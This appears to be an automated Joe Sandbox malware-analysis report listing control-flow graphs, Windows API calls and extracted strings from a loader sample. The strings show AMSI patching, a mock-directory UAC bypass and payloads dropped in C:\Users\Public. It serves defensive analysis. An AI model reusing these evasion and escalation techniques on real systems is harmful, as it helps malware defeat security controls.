                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2e40000_x.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Library$FilePath$FreeSleep$LoadNameName_$AddressAttributesCloseCreateDeleteExecProcWrite
                                                                                                              • String ID: /d $ /o$.url$C:\Users\Public\$C:\Users\Public\CApha.exe$C:\Users\Public\alpha.exe$C:\Users\Public\pha.exe$C:\\Users\\Public\\Libraries\\$C:\\Windows \\SysWOW64\\$C:\\Windows \\SysWOW64\\per.exe$C:\\Windows\\System32\\esentutl.exe /y $HotKey=$IconIndex=$Initialize$OpenSession$ScanBuffer$ScanString$URL=file:"$UacInitialize$UacScan$UacUninitialize$[InternetShortcut]$lld.SLITUTEN
                                                                                                              • API String ID: 2171786310-3926298568
                                                                                                              • Opcode ID: f2c15c7aadc6d3381be350b105f4abe331dc56dce78068b0d699a7a6e38e2042
                                                                                                              • Instruction ID: 30abd09f4a7de87253beb135896256fb1c9fa09d365b5bcbf200f37570670730
                                                                                                              • Opcode Fuzzy Hash: f2c15c7aadc6d3381be350b105f4abe331dc56dce78068b0d699a7a6e38e2042
                                                                                                              • Instruction Fuzzy Hash: 07431B74BC015D9BDB10EB64EC81B9E73B6BB85304F6091E6A509BB654CF30AE82DF41

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 10970 2e5e678-2e5e67c 10971 2e5e681-2e5e686 10970->10971 10971->10971 10972 2e5e688-2e5ec81 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44740 * 2 call 2e44860 call 2e44778 call 2e430d4 call 2e446d4 * 2 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44740 call 2e47f2c call 2e449a0 call 2e44d74 call 2e44df0 call 2e44740 call 2e449a0 call 2e44d74 call 2e44df0 call 2e58788 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e447ec call 2e449a0 call 2e5894c call 2e44860 call 2e449a0 call 2e447ec call 2e449a0 call 2e5894c call 2e44860 call 2e449a0 call 2e447ec call 2e449a0 call 2e5894c call 2e44860 call 2e449a0 call 2e447ec call 2e449a0 call 2e5894c 10971->10972 11175 2e5ec87-2e5eedd call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 call 2e44860 call 2e449a0 call 2e446d4 call 2e447ec call 2e449a0 call 2e446d4 call 2e589d0 WaitForSingleObject CloseHandle * 2 call 2e44860 call 2e449a0 call 2e447ec call 2e449a0 call 2e5894c call 2e44860 call 2e449a0 call 2e447ec call 2e449a0 call 2e5894c call 2e44860 call 2e449a0 call 2e447ec call 2e449a0 call 2e5894c call 2e44860 call 2e449a0 call 2e447ec call 2e449a0 call 2e5894c * 3 10972->11175 11176 2e5eee2-2e5ef2f call 2e44500 call 2e44c60 call 2e44500 call 2e44c60 call 2e44500 10972->11176 11175->11176
                                                                                                              APIs
                                                                                                                • Part of subcall function 02E589D0: FreeLibrary.KERNEL32(743E0000,00000000,00000000,00000000,00000000,02EC738C,Function_0000662C,00000004,02EC739C,02EC738C,05F5E103,00000040,02EC73A0,743E0000,00000000,00000000), ref: 02E58AAA
                                                                                                                • Part of subcall function 02E58788: CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02E58814
                                                                                                                • Part of subcall function 02E5894C: LoadLibraryW.KERNEL32(bcrypt,?,000008A0,00000000,02EC73A8,02E5A587,ScanString,02EC73A8,02E5A93C,ScanBuffer,02EC73A8,02E5A93C,Initialize,02EC73A8,02E5A93C,UacScan), ref: 02E58960
                                                                                                                • Part of subcall function 02E5894C: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 02E5897A
                                                                                                                • Part of subcall function 02E5894C: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,000008A0,00000000,02EC73A8,02E5A587,ScanString,02EC73A8,02E5A93C,ScanBuffer,02EC73A8,02E5A93C,Initialize), ref: 02E589B6
                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF,ScanString,02EC7380,02E5EF4C,OpenSession,02EC7380,02E5EF4C,UacScan,02EC7380,02E5EF4C,ScanBuffer,02EC7380,02E5EF4C,OpenSession,02EC7380), ref: 02E5ED6E
                                                                                                              • CloseHandle.KERNEL32(00000000,00000000,000000FF,ScanString,02EC7380,02E5EF4C,OpenSession,02EC7380,02E5EF4C,UacScan,02EC7380,02E5EF4C,ScanBuffer,02EC7380,02E5EF4C,OpenSession), ref: 02E5ED76
                                                                                                              • CloseHandle.KERNEL32(000008A8,00000000,00000000,000000FF,ScanString,02EC7380,02E5EF4C,OpenSession,02EC7380,02E5EF4C,UacScan,02EC7380,02E5EF4C,ScanBuffer,02EC7380,02E5EF4C), ref: 02E5ED7F
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1478003317.0000000002E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1477966534.0000000002E40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1478188879.0000000002E6E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002EC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2e40000_x.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Library$CloseFreeHandle$AddressCreateLoadObjectProcProcessSingleUserWait
                                                                                                              • String ID: )"C:\Users\Public\Libraries\lxsyrsiW.cmd" $Amsi$AmsiOpenSession$Initialize$NtOpenProcess$NtSetSecurityObject$OpenSession$ScanBuffer$ScanString$UacScan$ntdll
                                                                                                              • API String ID: 3475578485-1053911981
                                                                                                              • Opcode ID: 2567eeea6fabad2ee467693f64dd669d2448d051c3a247d0f7983bf2b692cb97
                                                                                                              • Instruction ID: c6878294547683dbb5c1e5c870edadf453d376c36cb966d464df1a4a98ced7ca
                                                                                                              • Opcode Fuzzy Hash: 2567eeea6fabad2ee467693f64dd669d2448d051c3a247d0f7983bf2b692cb97
                                                                                                              • Instruction Fuzzy Hash: 51220234B902699BEB11FB65E881F8E73B6AF85300F54E0A1B504AB694DF30AE41CF55

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 13139 2e41724-2e41736 13140 2e4173c-2e4174c 13139->13140 13141 2e41968-2e4196d 13139->13141 13142 2e417a4-2e417ad 13140->13142 13143 2e4174e-2e4175b 13140->13143 13144 2e41a80-2e41a83 13141->13144 13145 2e41973-2e41984 13141->13145 13142->13143 13150 2e417af-2e417bb 13142->13150 13146 2e41774-2e41780 13143->13146 13147 2e4175d-2e4176a 13143->13147 13151 2e41684-2e416ad VirtualAlloc 13144->13151 13152 2e41a89-2e41a8b 13144->13152 13148 2e41986-2e419a2 13145->13148 13149 2e41938-2e41945 13145->13149 13158 2e417f0-2e417f9 13146->13158 13159 2e41782-2e41790 13146->13159 13153 2e41794-2e417a1 13147->13153 13154 2e4176c-2e41770 13147->13154 13160 2e419a4-2e419ac 13148->13160 13161 2e419b0-2e419bf 13148->13161 13149->13148 13155 2e41947-2e4195b Sleep 13149->13155 13150->13143 13162 2e417bd-2e417c9 13150->13162 13156 2e416df-2e416e5 13151->13156 13157 2e416af-2e416dc call 2e41644 13151->13157 13155->13148 13163 2e4195d-2e41964 Sleep 13155->13163 13157->13156 13169 2e4182c-2e41836 13158->13169 13170 2e417fb-2e41808 13158->13170 13165 2e41a0c-2e41a22 13160->13165 13166 2e419c1-2e419d5 13161->13166 13167 2e419d8-2e419e0 13161->13167 13162->13143 13168 2e417cb-2e417de Sleep 13162->13168 13163->13149 13172 2e41a24-2e41a32 13165->13172 13173 2e41a3b-2e41a47 13165->13173 13166->13165 13178 2e419e2-2e419fa 13167->13178 13179 2e419fc-2e419fe call 2e415cc 13167->13179 13168->13143 13177 2e417e4-2e417eb Sleep 13168->13177 13174 2e418a8-2e418b4 13169->13174 13175 2e41838-2e41863 13169->13175 13170->13169 13171 2e4180a-2e4181e Sleep 13170->13171 13171->13169 13181 2e41820-2e41827 Sleep 13171->13181 13172->13173 13182 2e41a34 13172->13182 13185 2e41a68 13173->13185 13186 2e41a49-2e41a5c 13173->13186 13187 2e418b6-2e418c8 13174->13187 13188 2e418dc-2e418eb call 2e415cc 13174->13188 13183 2e41865-2e41873 13175->13183 13184 2e4187c-2e4188a 13175->13184 13177->13142 13189 2e41a03-2e41a0b 13178->13189 13179->13189 13181->13170 13182->13173 13183->13184 13190 2e41875 13183->13190 13191 2e4188c-2e418a6 call 2e41500 13184->13191 13192 2e418f8 13184->13192 13193 2e41a6d-2e41a7f 13185->13193 13186->13193 13194 2e41a5e-2e41a63 call 2e41500 13186->13194 13195 2e418cc-2e418da 13187->13195 13196 2e418ca 13187->13196 13199 2e418fd-2e41936 13188->13199 13202 2e418ed-2e418f7 13188->13202 13190->13184 13191->13199 13192->13199 13194->13193 13195->13199 13196->13195
                                                                                                              APIs
                                                                                                              • Sleep.KERNEL32(00000000), ref: 02E417D0
                                                                                                              • Sleep.KERNEL32(0000000A,00000000), ref: 02E417E6
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1478003317.0000000002E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1477966534.0000000002E40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1478188879.0000000002E6E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002EC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2e40000_x.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Sleep
                                                                                                              • String ID:
                                                                                                              • API String ID: 3472027048-0
                                                                                                              • Opcode ID: df0a1454c7b76ddbe6b5505dd59df05d53bcb043b511618ff8551d2d3b58adac
                                                                                                              • Instruction ID: 08221208a99272f3063211c36f69c014b7b369bccbc04f3962a4645d68c3d563
                                                                                                              • Opcode Fuzzy Hash: df0a1454c7b76ddbe6b5505dd59df05d53bcb043b511618ff8551d2d3b58adac
                                                                                                              • Instruction Fuzzy Hash: 25B10272AC02408BCF15CFA9E494355BBE1EB86315F29D6BAE44D8F2C5DB7094D2CB90

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                              • LoadLibraryW.KERNEL32(amsi), ref: 02E588C1
                                                                                                                • Part of subcall function 02E58274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02E582FC,?,?,00000000,00000000,?,02E58215,00000000,KernelBASE,00000000,00000000,02E5823C), ref: 02E582C1
                                                                                                                • Part of subcall function 02E58274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02E582C7
                                                                                                                • Part of subcall function 02E58274: GetProcAddress.KERNEL32(?,?), ref: 02E582D9
                                                                                                                • Part of subcall function 02E57D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02E57DEC
                                                                                                              • FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 02E58920
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1478003317.0000000002E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1477966534.0000000002E40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1478188879.0000000002E6E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002EC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2e40000_x.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AddressLibraryProc$FreeHandleLoadMemoryModuleVirtualWrite
                                                                                                              • String ID: DllGetClassObject$W$amsi
                                                                                                              • API String ID: 941070894-2671292670
                                                                                                              • Opcode ID: 615153ad0bbab0942eb02bd664444f573450f6b38a7ab38686d2094eab86cee4
                                                                                                              • Instruction ID: abd68e824dbbecb787fcc866f332769286cab024f3010753a18d0da35261822e
                                                                                                              • Opcode Fuzzy Hash: 615153ad0bbab0942eb02bd664444f573450f6b38a7ab38686d2094eab86cee4
                                                                                                              • Instruction Fuzzy Hash: 72F0A45049C381B9E300E3748C45F4BBECD4B62264F00DA58F5E89A2D2D675D1548767

                                                                                                              Control-flow Graph

                                                                                                              • Executed
                                                                                                              • Not Executed
                                                                                                              control_flow_graph 13227 2e41a8c-2e41a9b 13228 2e41aa1-2e41aa5 13227->13228 13229 2e41b6c-2e41b6f 13227->13229 13232 2e41aa7-2e41aae 13228->13232 13233 2e41b08-2e41b11 13228->13233 13230 2e41b75-2e41b7f 13229->13230 13231 2e41c5c-2e41c60 13229->13231 13237 2e41b81-2e41b8d 13230->13237 13238 2e41b3c-2e41b49 13230->13238 13234 2e41c66-2e41c6b 13231->13234 13235 2e416e8-2e4170b call 2e41644 VirtualFree 13231->13235 13239 2e41ab0-2e41abb 13232->13239 13240 2e41adc-2e41ade 13232->13240 13233->13232 13236 2e41b13-2e41b27 Sleep 13233->13236 13255 2e41716 13235->13255 13256 2e4170d-2e41714 13235->13256 13236->13232 13243 2e41b2d-2e41b38 Sleep 13236->13243 13245 2e41bc4-2e41bd2 13237->13245 13246 2e41b8f-2e41b92 13237->13246 13238->13237 13244 2e41b4b-2e41b5f Sleep 13238->13244 13247 2e41ac4-2e41ad9 13239->13247 13248 2e41abd-2e41ac2 13239->13248 13241 2e41ae0-2e41af1 13240->13241 13242 2e41af3 13240->13242 13241->13242 13250 2e41af6-2e41b03 13241->13250 13242->13250 13243->13233 13244->13237 13253 2e41b61-2e41b68 Sleep 13244->13253 13251 2e41bd4-2e41bd9 call 2e414c0 13245->13251 13252 2e41b96-2e41b9a 13245->13252 13246->13252 13250->13230 13251->13252 13258 2e41bdc-2e41be9 13252->13258 13259 2e41b9c-2e41ba2 13252->13259 13253->13238 13260 2e41719-2e41723 13255->13260 13256->13260 13258->13259 13262 2e41beb-2e41bf2 call 2e414c0 13258->13262 13263 2e41bf4-2e41bfe 13259->13263 13264 2e41ba4-2e41bc2 call 2e41500 13259->13264 13262->13259 13267 2e41c00-2e41c28 VirtualFree 13263->13267 13268 2e41c2c-2e41c59 call 2e41560 13263->13268
                                                                                                              APIs
                                                                                                              • Sleep.KERNEL32(00000000,?,?,00000000,02E41FE4), ref: 02E41B17
                                                                                                              • Sleep.KERNEL32(0000000A,00000000,?,?,00000000,02E41FE4), ref: 02E41B31
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1478003317.0000000002E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1477966534.0000000002E40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1478188879.0000000002E6E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002EC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2e40000_x.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Sleep
                                                                                                              • String ID:
                                                                                                              • API String ID: 3472027048-0
                                                                                                              • Opcode ID: 2cd3f95ea364003e425be0a3e2ea73a5bbdcfc5135d25863817df41918f67892
                                                                                                              • Instruction ID: a6bac1fc8db18414c2f9373e1892860c44ee9565992bd8045358014a5a1d1816
                                                                                                              • Opcode Fuzzy Hash: 2cd3f95ea364003e425be0a3e2ea73a5bbdcfc5135d25863817df41918f67892
                                                                                                              • Instruction Fuzzy Hash: E751B1716802408FDF15CF68E994756BBE0AB45318F28D5BEE84CCF286EB6094C5CB91

                                                                                                              Control-flow Graph

                                                                                                              APIs
                                                                                                              • InternetCheckConnectionA.WININET(00000000,00000001,00000000), ref: 02E5E5F6
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1478003317.0000000002E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1477966534.0000000002E40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1478188879.0000000002E6E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002EC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2e40000_x.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CheckConnectionInternet
                                                                                                              • String ID: Initialize$OpenSession$ScanBuffer
                                                                                                              • API String ID: 3847983778-3852638603
                                                                                                              • Opcode ID: 473d849225076cfb405299d220c65f17173e920359c9915e39329bdd65d17251
                                                                                                              • Instruction ID: aa7e16760c5f3bef9f36e3e98cd2ff82e7ec056e7b4fcbe438c5235591f02190
                                                                                                              • Opcode Fuzzy Hash: 473d849225076cfb405299d220c65f17173e920359c9915e39329bdd65d17251
                                                                                                              • Instruction Fuzzy Hash: 2C415375B90158ABEB01EBA4E841FDE73FAEF88700F60D461F940A7680DE70AE018F55
                                                                                                              APIs
                                                                                                                • Part of subcall function 02E581CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02E5823C,?,?,00000000,?,02E57A7E,ntdll,00000000,00000000,02E57AC3,?,?,00000000), ref: 02E5820A
                                                                                                                • Part of subcall function 02E581CC: GetModuleHandleA.KERNELBASE(?), ref: 02E5821E
                                                                                                                • Part of subcall function 02E58274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02E582FC,?,?,00000000,00000000,?,02E58215,00000000,KernelBASE,00000000,00000000,02E5823C), ref: 02E582C1
                                                                                                                • Part of subcall function 02E58274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02E582C7
                                                                                                                • Part of subcall function 02E58274: GetProcAddress.KERNEL32(?,?), ref: 02E582D9
                                                                                                              • CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,00000000,Kernel32,00000000,00000000,00000000), ref: 02E58814
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1478003317.0000000002E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1477966534.0000000002E40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1478188879.0000000002E6E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002EC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2e40000_x.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: HandleModule$AddressProc$CreateProcessUser
                                                                                                              • String ID: CreateProcessAsUserW$Kernel32
                                                                                                              • API String ID: 3130163322-2353454454
                                                                                                              • Opcode ID: aa176d005bda69586f301c766437b2d5f4369356895ccb56675fba6f62253880
                                                                                                              • Instruction ID: 2908c5059ee52f7887f1919e850c99ad35ea798ad64ddb68314391ecc2c719a5
                                                                                                              • Opcode Fuzzy Hash: aa176d005bda69586f301c766437b2d5f4369356895ccb56675fba6f62253880
                                                                                                              • Instruction Fuzzy Hash: 6211D6B2690248AFEB40EE9DED41F9A77EDEB4C700F919420BE08D3640C634ED508B24
                                                                                                              APIs
                                                                                                                • Part of subcall function 02E581CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02E5823C,?,?,00000000,?,02E57A7E,ntdll,00000000,00000000,02E57AC3,?,?,00000000), ref: 02E5820A
                                                                                                                • Part of subcall function 02E581CC: GetModuleHandleA.KERNELBASE(?), ref: 02E5821E
                                                                                                                • Part of subcall function 02E58274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02E582FC,?,?,00000000,00000000,?,02E58215,00000000,KernelBASE,00000000,00000000,02E5823C), ref: 02E582C1
                                                                                                                • Part of subcall function 02E58274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02E582C7
                                                                                                                • Part of subcall function 02E58274: GetProcAddress.KERNEL32(?,?), ref: 02E582D9
                                                                                                              • WinExec.KERNEL32(?,?), ref: 02E58624
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1478003317.0000000002E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1477966534.0000000002E40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1478188879.0000000002E6E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002EC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2e40000_x.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: HandleModule$AddressProc$Exec
                                                                                                              • String ID: Kernel32$WinExec
                                                                                                              • API String ID: 2292790416-3609268280
                                                                                                              • Opcode ID: a42835f072d13be2ec43d8a85533e49625236ccabe7207639ea39d39ae6a80bc
                                                                                                              • Instruction ID: bd81df018d1127e88faf919b1747f4ebcc336b95b3bfb174e9f2dda12fe43ced
                                                                                                              • Opcode Fuzzy Hash: a42835f072d13be2ec43d8a85533e49625236ccabe7207639ea39d39ae6a80bc
                                                                                                              • Instruction Fuzzy Hash: DC0181717D4244BFEB00EBE9EC42F5A7BEDE748700FA0E420BD00D2650DA74AD518E24
                                                                                                              APIs
                                                                                                                • Part of subcall function 02E581CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02E5823C,?,?,00000000,?,02E57A7E,ntdll,00000000,00000000,02E57AC3,?,?,00000000), ref: 02E5820A
                                                                                                                • Part of subcall function 02E581CC: GetModuleHandleA.KERNELBASE(?), ref: 02E5821E
                                                                                                                • Part of subcall function 02E58274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02E582FC,?,?,00000000,00000000,?,02E58215,00000000,KernelBASE,00000000,00000000,02E5823C), ref: 02E582C1
                                                                                                                • Part of subcall function 02E58274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02E582C7
                                                                                                                • Part of subcall function 02E58274: GetProcAddress.KERNEL32(?,?), ref: 02E582D9
                                                                                                              • WinExec.KERNEL32(?,?), ref: 02E58624
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1478003317.0000000002E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1477966534.0000000002E40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1478188879.0000000002E6E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002EC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2e40000_x.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: HandleModule$AddressProc$Exec
                                                                                                              • String ID: Kernel32$WinExec
                                                                                                              • API String ID: 2292790416-3609268280
                                                                                                              • Opcode ID: 09fd37d25c4c733a19e349c3755fee0974ecb7205a6170c7f0dfc46ac0f4dc75
                                                                                                              • Instruction ID: 1d03ed72986376380c63768ac81022c75c4fbf9252b3b31810f292d01a97d6a4
                                                                                                              • Opcode Fuzzy Hash: 09fd37d25c4c733a19e349c3755fee0974ecb7205a6170c7f0dfc46ac0f4dc75
                                                                                                              • Instruction Fuzzy Hash: F4F081717D4244BFEB00EBE5EC42F5A7BEDE748700FA0E420BD00D2650DA74AD518E24
                                                                                                              APIs
                                                                                                              • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,02E55D74,?,?,02E53900,00000001), ref: 02E55C88
                                                                                                              • GetLastError.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,02E55D74,?,?,02E53900,00000001), ref: 02E55CB6
                                                                                                                • Part of subcall function 02E47D5C: CreateFileA.KERNEL32(00000000,00000000,00000000,00000000,00000003,00000080,00000000,?,?,02E53900,02E55CF6,00000000,02E55D74,?,?,02E53900), ref: 02E47DAA
                                                                                                                • Part of subcall function 02E47F98: GetFullPathNameA.KERNEL32(00000000,00000104,?,?,?,02E53900,02E55D11,00000000,02E55D74,?,?,02E53900,00000001), ref: 02E47FB7
                                                                                                              • GetLastError.KERNEL32(00000000,02E55D74,?,?,02E53900,00000001), ref: 02E55D1B
                                                                                                                • Part of subcall function 02E4A778: FormatMessageA.KERNEL32(00003200,00000000,?,00000000,?,00000100,00000000,?,02E4C3D9,00000000,02E4C433), ref: 02E4A797
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000004.00000002.1478003317.0000000002E41000.00000020.00001000.00020000.00000000.sdmp, Offset: 02E40000, based on PE: true
                                                                                                              • Associated: 00000004.00000002.1477966534.0000000002E40000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1478188879.0000000002E6E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002EC7000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002FBB000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000004.00000002.1479661904.0000000002FBE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_4_2_2e40000_x.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: CreateErrorFileLast$FormatFullMessageNamePath
                                                                                                              • String ID:
                                                                                                              • API String ID: 503785936-0
                                                                                                              • Opcode ID: 0bda92ad237196620f1c68c9bf0df0886bb5b1a25cf4548c956cdb00e69bc576
                                                                                                              • Instruction ID: df116c062cce926004beeacf1d5e5676098362cea7e4a4d3d7c85561b94d5466
